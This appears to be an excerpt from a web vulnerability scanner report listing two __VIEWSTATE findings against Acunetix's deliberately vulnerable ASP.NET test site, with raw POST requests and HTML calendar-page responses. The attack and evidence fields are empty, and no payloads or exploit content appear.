Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1161 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,161 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8257&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgAAvkRjetoIZGRkJjj3df1rh9pfswahDREwyzdN220%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKy3o6cBAKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DsnfswzIpe%2BOi1pN6%2FHX4TEWIrYM%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:06:12 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgAAvkRjetoIZGRkJjj3df1rh9pfswahDREwyzdN220=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKy3o6cBAKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DsnfswzIpe+Oi1pN6/HX4TEWIrYM=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:White" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8261&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgAAZe6HfdoIZGRkhoknL7pghjVL7H%2FpzY6FjYqxjxk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKW0qW2BQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DEv%2FuSZSD%2FAofi0oluIq83JE2EoI%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:17:51 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgAAZe6HfdoIZGRkhoknL7pghjVL7H/pzY6FjYqxjxk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKW0qW2BQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DEv/uSZSD/Aofi0oluIq83JE2EoI=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:White" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
